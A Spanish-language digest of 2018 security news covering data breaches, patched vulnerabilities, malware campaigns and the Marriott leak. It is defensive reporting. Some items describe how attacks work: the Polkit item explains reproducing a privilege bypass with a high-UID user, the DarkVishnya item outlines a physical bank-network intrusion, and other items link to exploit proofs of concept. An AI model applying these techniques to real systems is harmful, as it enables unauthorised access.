Si desea recibir información sobre nuestros planes de seguridad contacte con el departamento comercial al email comercial@hispasec.com o al teléfono +34 952 020 494.

Gestor de contraseñas online, expone información de sus usuarios y avisa casi un año después

La filtración en este gestor de contraseñas online incluye correos electrónicos, nombres y apellidos, direcciones IP, hashes de contraseña y recordatorios de contraseña

El día 13 de diciembre del pasado año, el equipo de seguridad de Abine descubrió que información sensible de sus usuarios podría haberse visto expuesta hasta el día 6 de enero del mismo año. Los datos incluidos son:

• Todas las direcciones de email de las cuentas de usuario.
• Nombres y apellidos de algunos de los usuarios.
• Recordatorios de contraseña, aunque sólo de aquellos que siguiesen usando este servicio a través de un antiguo producto de la compañía.
• Última y penúltima dirección IP con la que accedieron todos sus usuarios.
• Hashes de contraseña de la cuenta de Blur utilizando Bcrypt de forma segura.

La filtración no afecta a los datos almacenados en la cartera de contraseñas, así como a la información de pago por el servicio. Tampoco se han visto afectados los usuarios que hayan creado su cuenta tras el día 6 de enero del 2018, fecha de la que data la filtración. No obstante, al haberse revelado los hashes de contraseña, desde la empresa ya han recomendado a sus usuarios cambiar su clave de acceso.

Aunque en el comunicado no se ha descrito en qué ha consistido la filtración, ni quién ha podido tener acceso a la misma, sorprende la diferencia de tiempo entre que se realizó (6 de enero) y se descubrió (13 de diciembre). Al no haber información adicional, sólo cabe elucubrar sobre si la filtración fue debida a un descuido de un empleado, un trabajador descontento, o si se debe a una vulnerabilidad ya resuelta o aún disponible.

Fuente:

Blur Security Update:
https://www.abine.com/blog/2018/blur-security-update/

Las 25 peores contraseñas del 2018

En el ranking de las peores contraseñas del 2018, podemos ver que ‘123456’ y ‘password’ se mantienen en primer lugar, al igual que en el TOP del año pasado.

Cada año SplashData evalúa millones de credenciales a partir de filtraciones de datos y realiza un ranking de las contraseñas más inseguras. Este año entre las 25 primeras podemos encontrar combinaciones nemotécnicas de teclado, como ‘123456’, ‘qwerty’ o ‘zxcvbnm’, nombres propios, como ‘charlie’, e incluso el presidente de los estados unidos ‘donald’ no se libra de aparecer como contraseña.

Listado de las 25 peores contraseñas:

Aquí puedes ver la lista de las 100 peores contraseñas.

Para evitar caer en esta lista y ser vulnerable a ataques de fuerza bruta es importante seguir una serie de directrices para que tus credenciales sean seguras:

• Crea contraseñas que combinen letras mayúsculas y minúsculas, números y símbolos.
• Importante que la contraseña no tenga menos de 15 caracteres: cuantos más dígitos tenga la contraseña, más difícil es romperla por fuerza bruta si se consigue su hash.
• No reutilizar la misma contraseña en diferentes servicios. Si es necesario, utilizar un gestor de contraseñas como KeePass, Bitwarden, etc. Con ellos puedes generar contraseñas seguras.
• No utilizar patrones de teclado, por ejemplo ‘qwertyuiop’ o ‘1qaz2wsx3edc’
• No apuntar la contraseña en notas y pegarlas al escritorio u ordenador, aunque parezca obvio, es algo muy común.
• Por último una buena acción es comprobar que la contraseña no está en diccionarios de passwords públicos.

Más información: 

TeamsID
https://www.teamsid.com/100-worst-passwords-top-50/

Ejecución remota de código a través de Microsoft Edge

El pasado 11 de diciembre, Microsoft hacía pública una vulnerabilidad en Microsoft Edge que permitía a un atacante ejecutar código arbitrario de forma remota.

La vulnerabilidad, etiquetada con CVE-2018-8629, se encuentra en el componente “Chakra”, el interprete de JScript utilizado por el navegador. Y se debe a un fallo a la hora de gestionar los objetos en memoria que podría ser aprovechado por un atacante para corromper dicha memoria y ejecutar código arbitrario en el contexto y con los permisos del usuario actual. Pudiendo así instalar programas, ver, modificar o eliminar información o crear nuevas cuentas de usuario.

En un posible escenario, el atacante podría utilizar una web especialmente diseñada o vulnerada para explotar el fallo en el sistema de la víctima que visite la página.

El equipo de investigadores de @phoenhex ha publicado una prueba de concepto que, en a penas 70 líneas, permite leer información de la memoria.

Se recomienda instalar cuanto antes el parche publicado por Microsoft para solucionar esta vulnerabilidad.

Más información

OOB read leak by bkth from phoenhex for ChakraCore https://github.com/phoenhex/files/blob/master/pocs/cve-2018-8629-chakra.js

Un nuevo ransomware infecta servidores Linux a través de IPMI

Se ha detectado un nuevo malware de tipo ransomware utilizado para infectar servidores Linux a través IPMI

Cibercriminales chinos atacan las redes de HP e IBM y luego atacan a sus clientes

Cibercriminales que trabajan presuntamente para el Ministerio de Seguridad del Estado de China han perpetrado un ataque contra HP e IBM y posteriormente atacaron a sus clientes con el objetivo de robar información sensible.

Como ya sabemos, en la época en la que vivimos, la información es poder, y no dejaremos de leer noticias como ésta en la que dos gigantes se enfrentan para obtener información que deje entrever los trapos sucios de unas u otras empresas.

Tal es así que Estados Unidos, a través de su secretario de estado Mike Pompeo y la responsable de Seguridad Nacional Kirstjen Nielsen, afirman estar recibiendo una amplia campaña de ciberataques por parte de China contra su propiedad intelectual y con motivo de la obtención de datos comerciales. Estados Unidos afirma que la campaña china no solo afecta a sus infraestructuras sino que Europa y Asia también pueden verse involucrados.

IBM declara que no tiene pruebas de que sus datos confidenciales se hayan visto comprometidos, mientras que HP declara que no puede hacer comentarios al respecto.

China niega todo lo relacionado con los ciberataques pero vuelven a tensarse las comunicaciones con EEUU. Ha calificado las denuncias como difamatorias y ha presentado una nueva queja formal contra Estados Unidos, que se suma a la presentada hace apenas dos semanas por el denominado caso Huawei.

Dos ciudadanos chinos, Zhu Hua y Zhang Jianguo, supuestamente vinculados a una agencia de espionaje, han sido acusados de robar datos confidenciales de agencias gubernamentales del país y de empresas de todo el mundo. Empresas como la NASA, la Marina o el Departamento de Energía pudieron ser el objetivo de estos cibercriminales.

Estos piratas informáticos han sido acusados de conspirar para cometer intrusiones en empresas de Estados Unidos y de todo el mundo y los relacionarían con la agencia de inteligencia del Ministerio de Seguridad del Estado de China.

“Ningún país representa una amenaza más amplia y severa a largo plazo para la economía y la infraestructura informática de nuestro país que China” Afirmó el director del FBI, Chris Wray, en una rueda de prensa.

Según el responsable de la oficina federal de investigación la intención de China es ocupar el lugar de estados unidos como “Potencia líder en el mundo”

¿Qué opináis vosotros?

Fuentes:

https://thehackernews.com/2018/12/chinese-hacker-wanted-by-fbi.html

Amazon envía por error 1.700 grabaciones de Alexa de otro cliente

Las conversaciones permitieron encontrar fácilmente a la persona afectada y a su pareja, además de conocer sus hábitos y horarios

El Reglamento General de Protección de Datos (GDPR) de la Unión Europea permite solicitar a un consumidor los datos que tiene una empresa sobre él. Un usuario alemán de Amazon, amparándose en dicha ley, recibió en un zip de 100MiB unos 50 archivos con sus búsquedas e información privada, además de 1.700 ficheros de audio junto con transcripciones, a pesar de que nunca había usado Alexa.

El usuario intentó hablar con Amazon, pero al no recibir respuesta contactó con la revista c’t Magazine para buscar a la persona que aparecía en las grabaciones que recibió. A pesar de que durante este tiempo Amazon borró el enlace para descargar el zip (tal vez al darse cuenta del error), ya se había realizado una copia de seguridad, lo que permitió continuar la investigación.

Gracias a la grabaciones, la revista pudo obtener un perfil de la persona que aparecía un ellas. No fue complicado, ya que aparecía nombres de transportes públicos que utilizaba, personas con las que hablaba, sus nombres, sus trabajos, gustos musicales… También se escuchaba en las grabaciones a la víctima hablar con su novia, a la que se llega a oír cómo se ducha en uno de los audios.

Tras conocer a la víctima y hablar con ella a través de Twitter, el medio contactó también con Amazon para exponer los hechos, pero sin revelar que habían descubierto a la persona afectada. Finalmente, la empresa respondió a los 3 días, asegurando que había llamado a las personas involucradas para explicarles que todo había sido debido a un error humano, y que iban a tomar medidas para que algo así no volviese a suceder.

Amazon se negó a responder preguntas a la prensa, pero aseguró que fueron conscientes del fallo por sí mismos. Esto plantea un posible problema legal en Europa para Amazon, ya que la nueva ley (GDPR) obliga a las empresas a notificar este tipo de incidencias a las 72 horas de descubrirse. Si lo sucedido se hubiese ocultado, podría estar obliga a pagar hasta 20 millones (o el 4% de su facturación) por haber incumplido la ley.

Fuente:

Alexa, Who Has Access to My Data?
https://www.heise.de/downloads/18/2/5/6/5/3/9/6/ct.0119.016-018_engl.pdf

Nuevo malware: recibe comandos de memes de Twitter

La empresa Trend Micro ha sido la descubridora de este novedoso tipo de ataque que recoge los comandos de una cuenta de Twitter controlada por los atacantes.

Ejemplo de cuenta utilizada para mandar instrucciones al malware

¿Cuál es el malware en cuestión?

El malware utilizado es denominado “TROJAN.MSIL.BERBOMHTHUM.AA“. Su forma de trabajo es infectar un equipo, y tras ello descargar las imágenes que contienen las instrucciones a seguir.

¿Que información sacan de las imágenes?

Los memes publicados en la cuenta hacían uso de técnicas de Esteganografía para ocultar los comandos que ejecutaba el malware. Estos, tras ejecutar las instrucciones, accedían a una publicación de Pastebin para conseguir la dirección del servidor al que enviaban la información robada.

Según los investigadores, la cuenta de Twitter analizada se creó en 2017 y contenía solo dos memes que entregaban comandos “/ print” al malware para indicarle que realizara capturas de pantalla.

Este malware mandaba las capturas al servidor C&C sacado de la URL de Pastebin facilitada en la imagen.

¿Desde cuando se realiza este tipo de ataque?

Según VirusTotal, el malware surgió a mediados de octubre, pues fue cuando se creó la publicación en Pastebin.

Sin embargo, en los memes analizados, la dirección del servidor es local, lo que hace pensar que los ciberdelincuentes aún se encontraban realizando pruebas con el mismo antes del ataque.

Tras el reporte realizado por TrendMicro, Twitter tomó cartas en el asunto y cerró la cuenta involucrada.

Más información:

Post de TrendMicro:
https://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-use-malicious-memes-that-communicate-with-malware/

Revelación de información a través de Twitter

Un fallo en uno de los formularios de soporte de Twitter ha podido ser utilizado por atacantes financiados por el estado para revelar información sensible.

El pasado 15 de noviembre fue descubierto un ‘bug’ en uno de los formularios de Twitter utilizado para reportar incidencias que permitía revelar el código del país del número de teléfono asociado a una cuenta de Twitter o el estado (bloqueada o no) de dicha cuenta.

Tras investigar el fallo de seguridad, la compañía descubrió cierta actividad inusual relacionada con la API asociada a dicho formulario: un gran volumen de peticiones desde direcciones IP de China y Arabia Saudi que, según la compañía, pueden estar relacionadas con actores financiados por estos estados; como ha declarado Twitter en su anuncio oficial.

La vulnerabilidad fue resuelta el 16 de noviembre y aunque no era posible revelar el número de teléfono completo ni ninguna otra información personal, Twitter ha advertido a las cuentas afectadas.

Uso de técnicas de hacking con fines propagandísticos para un famoso youtuber: PewDiePie

PewDiePie es un youtuber sueco, quizás el youtuber más popular de internet. Actualmente su cuenta es la más seguida, junto con T-Series, una compañía musical india, de la que hablaremos en unas líneas.

Lo acontecido es cuando menos, premonitorio o claramente descriptivo de la sociedad en la que vivimos hoy en día, lo que puede ser considerado algo gracioso o anecdótico para algunos, nos alarma y preocupa profundamente a otros.

El popular Youtuber PewDiePie vio recientemente su trono amenazado al ver como la cuenta T-Series llegaba a igualarle en millones de suscriptores. Este caso fue usado por PewDiePie para crear contenido alrededor de este hecho y hacer un llamamiento a sus fans para no caer del primer puesto. En este vídeo de su canal podemos hacer un seguimiento en directo de ambas cuentas.

Pues bien, al menos dos de sus seguidores llevaron a cabo un ataque en cerca de 2 millones de impresoras de las cuales al menos en 100.000 de ellas lograron imprimir panfletos haciendo un llamamiento para buscar suscriptores de la cuenta de PewDiePie.

https://twitter.com/Thrillka/status/1074016514804715520/photo/1

Estas impresoras estaban abiertas a internet a través de los protocolos IPP, JetDirect y LPD, por lo que perfectamente podrían haber sido encontradas a través de la herramienta Shodan.

Al margen de lo ‘script kiddies’ del asunto, lo delirante del tema y sobre lo que debemos de poner el foco es sobre cómo un fanatismo, si bien es cierto que sustentado por un tono jocoso, ha llevado a estas dos personas a cometer un delito para, como se suele decir, llenarse de ‘loles’ y acrecentar su imagen virtual.

Fallo crítico en SQLite podría afectar a miles de apps

El grupo Blade de Tencent ha descubierto un fallo de seguridad en SQLite, que permite realizar RCE, o provocar rupturas inesperadas del programa que utiliza este servicio.

SQLite es un gestor de base de datos relacional y multiplataforma que encontramos embebido en multitud de aplicaciones y sistemas. Lo que diferencia a SQLite de otros SGBD es que no es un proceso independiente con el que el programa principal se comunica, sino que se lanza con el programa pasando a ser parte integral del mismo. Por eso esta vulnerabilidad estará presente durante largo tiempo en diferentes sistemas y aplicaciones, ya que es necesario actualizar la librería utilizada dentro de la aplicación.

Los investigadores de Tencent han descubierto la posibilidad de encontrar fugas de información del programa que se está ejecutando, detener su ejecución o incluso conseguirejecutar comandos de forma remota simplemente accediendo a una página web malintencionada, si se da el caso en el que el navegador soporte SQLite junto con la ya obsoleta API WebSQL, que es capaz de traducir el código del exploit a sintaxis SQL. Firefox y Edge no dan soporte a WebSQL, pero otros navegadores basados en el proyecto open-source de Chromium como motor del navegador sí, como es el caso de Google Chrome, Opera, Vivaldi, etc.

Pero, aún siendo los navegadores el principal objetivo de ataque, El equipo Blade afirmó en este comunicado que “ha sido posible explotar ‘Google Home’ con esta vulnerabilidad y actualmente no tienen pensado revelar el código utilizado para explotarla”. Mostrando así que el fallo no solo afecta a algunos navegadores, sino que todos los sistemas que utilicen SQLite que no estén actualizados y cumplan las características necesarias son vulnerables.

El fallo fue reportado al equipo de SQLite y actualizado en la versión SQLite 3.26.0 al igual que se reportó a Chromium y se ha limitado el uso de WebSQL en la nueva versión 71.

En esta prueba de concepto se bloquea el proceso del rendizador utilizando ‘Magellan’.

Claro que para que cause efecto es necesario utilizar el navegador adecuado, por ejemplo Google Chrome en una versión menor que la 71. En el código podemos ver que se utiliza el motor de búsqueda de texto completo (full-text) FTS3, y que se están alterando los datos de las ‘shadow tables’ manualmente.  Por otra parte, la nueva actualización de SQLite da la opción de utilizar estas mismas tablas con permiso ‘read-only’, lo que nos hace pensar en que el fallo nace en los permisos de acceso a las ‘shadow tables’.

Fuentes

zdnet
https://www.zdnet.com/article/sqlite-bug-impacts-thousands-of-apps-including-all-chromium-based-browsers/#ftag=RSSbaffb68

Tencent
https://blade.tencent.com/magellan/index_en.html

Github
https://github.com/zhuowei/worthdoingbadly.com/blob/master/_posts/2018-12-14-sqlitebug.html

SQLite Doc
https://www.sqlite.org/fts3.html#*shadowtab

Microsoft parchea una vulnerabilidad 0-day explotada activamente

Microsoft ha liberado el habitual paquete mensual acumulativo de parches de su sistema operativo Windows para el mes de diciembre.

En esta ocasión se han parcheado un total de 39 vulnerabilidades, 10 de las cuales tienen criticidad alta y otras tantas son valoradas como importantes.

Según Kaspersky, una de las vulnerabilidades era un 0-day que está siendo activamente explotado por varios grupos maliciosos (o APTs) tales como FruityArmor o SandCat.

El fallo en cuestión que está siendo aprovechado permite elevar privilegios a debido a un fallo en el kernel de Windows (ntoskml.exe) y ejecutar código arbitrario. A este fallo se le ha dado el identificador CVE-2018-8611 y consiste en una mala gestión en el procesado de ciertas operaciones en modo kernel. Lo que permite evitar las (modernas) políticas configuradas para los procesos.

Este fallo afecta a todas las versiones de Windows; desde Windows 7 hasta Windows Server 2019.

Otra vulnerabilidad con el identificador CVE-2018-8517 es una denegación de servicio remota presente en aplicaciones web desarrolladas con el framework .NET cuya causa es un manejo incorrecto de solicitudes web malformadas.

De esta última vulnerabilidad no se tienen evidencias de que haya sido explotada a gran escala.

El resto de parches cubren parches para distintos productos de la familia de Microsoft, tales como Edge, Internet Explorer, Office, etc.

Como siempre, se recomienda aplicar los parches de seguridad tan pronto como sea posible.

Más información:

https://thehackernews.com/2018/12/microsoft-patch-updates.html

https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/6c54acc6-2ed2-e811-a980-000d3a33a34d

Google + descubre un nuevo fallo de seguridad y acelera su cierre

Google, a través de un comunicado, ha acelerado el cierre de su plataforma Google + a 90 días hábiles desde el 10 de diciembre, en lugar del mes de abril de 2019, fecha prevista para el cierre definitivo de la fallida red social de Google.

Este comunicado ha sido propiciado por un nuevo fallo de seguridad encontrado por los propios procesos de seguridad del gigante tecnológico. El fallo fue introducido en una actualización de noviembre.

El fallo permitía a una aplicación de terceros solicitar información confidencial de un usuario aún cuando este no lo había autorizado, este fallo habría afectado a 52.5 millones de usuarios. La vulnerabilidad, concretamente estaba en la API “People: get” y potencialmente permitía la sustracción de la información personal de todos los usuarios de la red social, incluyendo nombres, direcciones de correo, ocupación laboral, edad, etc.

Cabe recordar que en el mes de octubre, ya nos hicimos eco desde en este mismo boletín, de la vulnerabilidad sufrida que precipitaba el cierre de la misma para el mes de abril.

Más información:

Notificación de Google: https://www.blog.google/technology/safety-security/expediting-changes-google-plus/

Unaaldía: https://unaaldia.hispasec.com/2018/10/google-expone-los-datos-de-500-000-usuarios-y-cierra-su-plataforma.html

Actualización crítica de phpMyAdmin

El proyecto phpMyAdmin, uno de los sistemas de administración de bases de datos MySQL más populares, dio un aviso el pasado domingo en su blog avisando sobre la última actualización de seguridad, algo que no habían hecho antes.

“Nos inspiramos en el flujo de trabajo de otros proyectos que a menudo anuncian con anticipación cualquier lanzamiento de seguridad para permitir que los encargados de paquetes y proveedores de alojamiento se preparen. Estamos experimentando si dicho flujo de trabajo es adecuado para nuestro proyecto”, explicaba el gerente de lanzamiento de phpMyAdmin, Isaac Bennetch.

Además de la típica corrección de errores, esta versión corrige tres vulnerabilidades críticas de seguridad.

Vulnerabilidades corregidas en la versión 4.8.4:

1. LFI (CVE-2018-19968):
   Las versiones de phpMyAdmin de entre 4.0 y 4.8.3 incluyen un error de inclusión de archivos locales que podría permitir la lectura de archivos locales del servidor a un atacante remoto.Para explotar esta vulnerabilidad, el atacante debe tener acceso a las tablas de almacenamiento de configuración de phpMyAdmin, aunque puede crearse fácilmente en cualquier base de datos a la que tenga acceso el atacante.
2. CSRF/XSRF (CVE-2018-19969):
   Las versiones de 4.7.0 a 4.7.6 y de 4.8.0 a 4.8.3 incluyen un defecto deCross-site Request Forgery que de ser explotado, permitiría a los atacantes realizar operaciones SQL malintencionadas.Para explotar esto únicamente deberían de convencer a las víctimas de que abran enlaces especialmente diseñados.
3. XSS (CVE-2018-19970):
   Hay un fallo de Cross-site Scripting entre las versiones 4.0 y 4.8.3 con el que un atacante puede inyectar código a través de un nombre de tabla/base de datos especialmente diseñado.

Se recomienda a todos los usuarios de este software que actualicen a la última versión cuanto antes.

Mas información:

Descarga de la versión 4.8.4:
https://www.phpmyadmin.net/files/4.8.4/

Comunicado de pre-lanzamiento:
https://www.phpmyadmin.net/news/2018/12/9/upcoming-security-release-pre-announcement/

Actualizaciones para múltiples productos Apple

Apple ha publicado 8 boletines de seguridad que solucionan vulnerabilidades en los productos iOS, macOS, watchOS, tvOS, Safari, iTunes e iCloud para Windows y Shortcuts para iOS. Entre todos los productos se corrigen 26 fallos de seguridad.

Los boletines publicados con las actualizaciones y problemas solucionados se resumen a continuación.

El boletín para el sistema operativo para dispositivos móviles de Apple (iPad, iPhone, iPod, etc.), iOS 12.1.1, resuelve 20 vulnerabilidades relacionadas con múltiples componentes, entre los que se incluyen ‘Airport’, ‘Disk Images’, ‘FaceTime’, el kernel y ‘WebKit’ entre otros. Cuatro de los fallos permitirían la ejecución de código arbitrario a través de una web especialmente manipulada (CVE-2018-4441, CVE-2018-4442, CVE-2018-4443 y CVE-2018-4438). Estas vulnerabilidades también están presentes en Safari, watchOS y tvOs. Otras dos vulnerabilidades en el kernel permitirían la ejecución de código arbitrario con privilegios de sistema (CVE-2018-4447 y CVE-2018-4461).

macOS Mojave 10.14.2 y los Security Update 2018-003 para High Sierra y 2018-006 para Sierra. En este caso se solucionan 13 vulnerabilidades que afectan a múltiples componentes, que entre otros incluyen a ‘Carbon Core’, ‘Disk Images’, ‘IOHIDFamily’, el kernel y ‘WindowServer’. Siete de estas vulnerabilidades podrían permitir la ejecución de código arbitrario con privilegios de kernel (CVE-2018-4463, CVE-2018-4465, CVE-2018-4427, CVE-2018-4447, CVE-2018-4461, CVE-2018-4449 y CVE-2018-4450).

Safari 12.0.2 cuenta con otro boletín que soluciona 9 vulnerabilidades debidas, en su mayoría, a problemas en ‘WebKit’, el motor de código abierto que es la base de este navegador. También varios de los errores corregidos permitirían que una web maliciosa suplantase la URL mostrada al usuario para hacerle creer que se encuentran en un sitio web legítimo (CVE-2018-4440 y CVE-2018-4439).

El boletín para el sistema operativo de los relojes inteligentes de Apple, watchOS 5.1.2, soluciona 15 vulnerabilidades entre las que también se encuentran algunas que podrían permitir la ejecución de código arbitrario (CVE-2018-4438, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4437, CVE-2018-4464, CVE-2018-4461, CVE-2018-4447, CVE-2018-4427).

tvOS, el sistema operativo de los televisores de la marca, se actualiza a la versión 12.1.1, donde se corrigen 14 vulnerabilidades en múltiples componentes. Dos de ellas permitirían elevar privilegios en el sistema (CVE-2018-4435 y CVE-2018-4303) y/o la ejecución de código arbitrario (CVE-2018-4438, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4437, CVE-2018-4464).

Las versiones iTunes 12.9.2 e iCould 7.9 para Windows corrigen 8 vulnerabilidades cada una, algunas también de gravedad alta.
Todas estas versiones que corrigen los problemas de seguridad publicados en los boletines se encuentran disponibles en la página oficial de Apple, así como a través de los canales habituales de actualización.

Más información:

Apple security updates
https://support.apple.com/en-us/HT201222

Nueva versión del troyano bancario ‘Marcher’ para Android

Una nueva versión del troyano bancario ‘Marcher’ ha sido detectada recientemente en Koodous, nuestro antivirus colaborativo

Bancos atacados mediante conexiones locales

Al menos ocho bancos de Europa del Este han sido atacados usando el mismo modus operandi, bautizado por Karspersky como DarkVishnya, causando más de diez millones de dólares en pérdidas.

Durante el año 2017 y también durante este mismo año, especialistas de la compañía antivirus Kaspersky investigaron varios incidentes de robo en al menos ocho bancos europeos.

Todos ellos compartían el mismo patrón de actuación; un dispositivo conectado diréctamente a la red local de la organización. En ocasiones en alguna oficina central, en otras, en una oficina regional o incluso, en otro país distinto.

El ataque comprende 3 fases bien definidas:

En una primera fase, se consigue acceso físico con la excusa de entregar un paquete, buscar un empleo en la compañía, etc. Una vez dentro de las instalaciones, se conecta un dispositivo a un PC o a alguna regleta con conexiones RJ45 (en alguna sala de reuniones o en lugares apartados sin llamar mucho la atención).

Éste dispositivo comunmente puede ser un netbook o un portátil barato, una Raspberry Pi o un Bash Bunny. Una vez conectado, el acceso a la red se conseguía mediante una conexión GPRS/3G/LTE presente en el dispositivo.

Más tarde, en una segunda fase, los atacantes comienzan a ganar acceso a directorios compartidos, servidores web y cualquier otro recurso abiertamiente disponible con el objetivo de obtener la mayor cantidad de información sobre la red. También usaban fuerza bruta o esnifaban conexiones de red para moverse lateralmente hasta llegar finalmente a las máquinas responsables de hacer pagos.

En la tercera y última fase, se mantenía el acceso a las máquinas de la organización mediante técnicas habituales para poder acceder en cualquier otro momento, tales como la habilitación de puertas traseras, escritorios remotos, etc.

Más información:

https://securelist.com/darkvishnya/89169/

Elevación de privilegios en Kubernetes

Una vulnerabilidad en el sistema de orquestación de Google permitiría a un atacante sin autenticar, conseguir privilegios de administrador en cualquier nodo de un cluster basado en Kubernetes.

Kubernetes es un sistema de orquestación open-source para gestionar aplicaciones en contenedores Docker, entre otros.

La vulnerabilidad, considerada de gravedad crítica, se encuentra en el componente OpenShift Container Platform 3.x y permitiría comprometer los “pods” en ejecución de un determinado nodo. Los “pods” son las unidades mínimas que puede manejar Kubernetes, y se componen de uno o más contenedores y volúmenes.

El fallo reside en una conexión TCP vulnerable, a través de la cuál un atacante remoto podría enviar peticiones especialmente manipuladas al servidor de API de Kubernetes y establecer una conexión con el “backend” utilizando las credenciales TLS de dicho servicio. De esta forma, podría acceder a cualquier “pod” en ejecución y acceder a información secreta, variables de entorno, procesos en ejecución, volúmenes, etc. Así como acceder a contenedores privilegiados. Adicionalmente, en versiones 3.6 y superiores de OpenShift Container Platform, la vulnerabilidad permitiría acceder con permisos de “administrador de cluster” a cualquier API del servidor de API de OpenShift, como por ejemplo los servicios ‘metrics-service’ y ‘servicecatalog’.

Un atacante con privilegios de administrador de cluster podría desplegar código malicioso o alterar alguno de estos servicios en ejecución.

Decir, que el servidor de API de OpenShift está incluido por defecto en todas las instalaciones de Kubernetes.

La vulnerabilidad ya se ha corregido y se recomienda actualizar cuanto antes.

Versiones seguras de OpenShift Container Platform:

• v3.11.43-1
• v3.10.72-1
• v3.9.51-1
• v3.8.44-1
• v3.7.72-1
• v3.6.173.0.140-1
• v3.5.5.31.80-1
• v3.4.1.44.57-1
• v3.3.1.46.45-1
• v3.2.1.34-2

Más información:

CVE-2018-1002105: proxy request handling in kube-apiserver can leave vulnerable TCP connections
https://github.com/kubernetes/kubernetes/issues/71411

Kubernetes Security Announcement – v1.10.11, v1.11.5, v1.12.3 released to address CVE-2018-1002105
https://groups.google.com/forum/#!forum/kubernetes-announce

Kubernetes privilege escalation and access to sensitive information in OpenShift products and services – CVE-2018-1002105
https://access.redhat.com/security/vulnerabilities/3716411

Acceso root en Polkit para usuarios con uid mayor a INT_MAX

El fallo, que aún no está solucionado, es reproducible ejecutando cualquier aplicación que utilice PolicyKit

PolicyKit, comúnmente llamado Polkit, es un componente para los sistemas Unix que permite a procesos no privilegiados ejecutar funciones que requieren permisos de superusuario, sin que estos tengan que ejecutarse como root. A diferencia de sudo, no requiere que todo el proceso sea ejecutado con privilegios del sistema, dando un mayor control sobre los permisos.

Este componente, empleado en la mayoría de distribuciones GNU/Linux y utilizado por múltiples programas, no controla correctamente los permisoscuando el usuario tiene un número de identificación (UID) superior al de INT_MAX (2147483647), pudiendo utilizar Polkit sin ninguna restricción y sin que se pida ninguna contraseña.

Ejemplo de explotación con un usuario con uid 4000000000. El usuario es capaz de parar un servicio, sin que este tenga permisos para ello.

Un ejemplo de programa que utiliza Polkit es Systemctl: cuando no son necesarios permisos, por ejemplo para ejecutar ‘systemctl status nginx’, se ejecuta el comando sin restricciones. No obstante, para ejecutar ‘systemctl stop nginx’ (parar un servicio), aparece una ventana de confirmación solicitando la contraseña del usuario, y sólo si éste estuviese autorizado podrá realizar la acción. Con esta vulnerabilidad, el comando se ejecuta sin necesidad de estar autorizado y sin que aparezca la ventana de confirmación.

La vulnerabilidad, con identificador CVE-2018-19788, todavía no se encuentra solucionada, aunque su explotación es complicada salvo que exista ya un usuario con un uid superior a 2147483647, algo de por sí difícil, y que probablemente sea la razón por la que ha pasado el fallo tanto tiempo desapercibido. Para probar la vulnerabilidad, basta con crear un nuevo usuario del sistema y modificar el uid, pudiendo ejecutar cualquiera de los comandos anteriores.

Más información:

CVE-2018-19788:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19788

unprivileged users with UID > INT_MAX can successfully execute any systemctl command:
https://github.com/systemd/systemd/issues/11026

Freedesktop issue:
https://gitlab.freedesktop.org/polkit/polkit/issues/74

Nuevo ransomware se difunde rápidamente en China

Un nuevo y característico ransomware se está propagando por China. De momento, ha infectado más de 100.000 equipos y va en aumento.

¿Por qué es diferente al resto de ransomwares vistos?

Lo característico de este malware es que, a diferencia del resto de ransomwares conocidos, no pide como rescate un pago en Bitcoin, sino 110 yuanes (alrededor de 14€) que se deben enviar a través de la aplicación WeChat Pay, la función de pago que ofrece la aplicación de mensajería más popular de China.

¿Cómo funciona el ransomware?

Propagación:

Según los investigadores de Velvet Security, los atacantes agregaron código malicioso al software de programación “EasyLanguage” utilizado por un gran número de desarrolladores de aplicaciones.

El software modificado fue diseñado para inyectar el código del ransomware en cada aplicación y producto de software compilado a través de él.

Evasión de antivirus:

Para evadir los programas de antivirus, los atacantes firmaron su código con la firma digital confiable de Tencent Technologies.

Rescate:

Una vez cifrado, el ransomware crea una nota y le pide a los usuarios que paguen la cantidad de 110 yuanes a la cuenta de WeChat de los atacantes en un plazo de tres días. Si no se paga dentro del tiempo mostrado, amenazan con eliminar automáticamente la clave de descifrado de su servidor C&C.

Robo de información y credenciales:

Una vez infectado el dispositivo, el malware recopila las credenciales de inicio de sesión de los sitios web chinos más populares y las envía a un servidor remoto.

Además, recopila información del dispositivo como: modelo de CPU, resolución de pantalla, información de la red, software instalado, etc.

¿Existen soluciones contra este malware?

Los investigadores de seguridad han descubierto que el cifrado utilizado por el ransomware es más débil de lo que parecía. Mientras que los atacantes especifican en la nota que utilizan DES para cifrar los archivos, realmente utilizan XOR y almacenan una copia de la clave de descifrado localmente.

Ruta de la clave de cifrado:
% user% \ AppData \ Roaming \ unname_1989 \ dataFile \ appCfg.cfg

Con está información, el equipo de seguridad de Velvet ha lanzado una herramienta gratuita de descifrado de este ransomware que puede desbloquear fácilmente los archivos cifrados.

Más información:

Información oficial:
https://www.huorong.cn/info/1543934825174.html

Fuga de información en la cadena hotelera Marriott

La compañía hotelera Marriott ha declarado que la base de datos de reservas deStarwood (filial de Marriott) ha sido comprometida, viéndose expuestos datos de hasta 500 millones de clientes, de los cuales 327 millones incluirían los datos de las tarjetas de crédito con la que se ha realizado el pago.

El 8 de septiembre de 2018 la cadena Marriott recibió la alerta del acceso a la base de datos de reservas de la red de Starwood a través de una herramienta interna de seguridad. En ese momento, la corporación contrató un servicio externo de expertos en seguridad para investigar el caso. Durante la investigación se descubrió que ha existido un continuo acceso no autorizado desde 2014. Por el momento no se han revelado los datos exactos extraídos de la base de datos, pero se estima que hasta 500 millones de personas que hicieron una reserva podrían estar afectados por esta brecha de seguridad.

Se estima que entre los afectados, existirían unos 327 millones de registros que contendrían información sensible acerca del medio de pago utilizado (número de tarjeta de crédito, fecha de vencimiento, etc.), datos personales del usuario (nombre, dirección, teléfono, correo electrónico, fecha de nacimiento, documento de identidad / pasaporte, etc.), información de la reserva (Check-in y Check-out), preferencias de comunicación y el identificador Starwood Preferred Guest (“SPG”).

La información referente a los medios de pago utilizados por los usuarios se encontraría cifrada con el algoritmo AES-128 y se necesitarían dos componentes para descifrarla, aunque aun no se ha confirmado si estos habrían sido conseguidos por los atacantes.

La cadena hotelera ha declarado que esta brecha de seguridad ha afectado únicamente a la red de Starwood, no habiendo sufrido ninguna modificación ni filtración la base de datos de Marriott.

